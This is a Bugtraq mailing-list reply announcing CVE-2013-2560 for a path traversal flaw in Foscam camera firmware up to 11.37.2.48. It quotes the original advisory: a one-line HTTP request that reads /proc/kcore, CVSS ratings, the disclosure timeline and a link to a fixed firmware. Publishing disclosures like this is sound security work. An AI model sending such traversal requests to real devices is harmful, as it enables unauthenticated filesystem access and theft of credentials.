Re: [CVE-REQUEST] Foscam <= 11.37.2.48 path traversal vulnerability

From: Frédéric BASSE <basse.frederic@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Re: [CVE-REQUEST] Foscam <= 11.37.2.48 path traversal vulnerability
Date:


CVE Assigned: CVE-2013-2560.

2013/3/2 Frdric BASSE <basse.frederic@gmail.com>:
> [CVE-REQUEST] Foscam <= 11.37.2.48 path traversal vulnerability
> _______________________________________________________________________
> Summary:
> Foscam firmware <= 11.37.2.48 is prone to a path traversal
> vulnerability in the embedded web interface.
>
> The unauthenticated attacker can access to the entire filesystem and
> steal web & wifi credentials.
> _______________________________________________________________________
> Details:
>
> GET //../proc/kcore HTTP/1.0
>
>
> ____________________________________________________________________
> CVSS Version 2 Metrics:
> Access Vector: Network exploitable
> Access Complexity: Low
> Authentication: Not required to exploit
> Confidentiality Impact: Complete
> Availability Impact: Complete
> _______________________________________________________________________
> Disclosure Timeline:
> 2013-01-18 Vendor fixed the issue in fw 11.37.2.49; no security notice
> 2013-02-21 Vulnerability found
> 2013-03-01 Public advisory
> _______________________________________________________________________
> Solution:
> A new firmware is available on vendor's site:
> http://www.foscam.com/down3.aspx
> _______________________________________________________________________
> References:
> http://code.google.com/p/bflt-utils/
> http://wiki.openipcam.com/
> _______________________________________________________________________
> Arnaud Calmejane - Frederic Basse





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.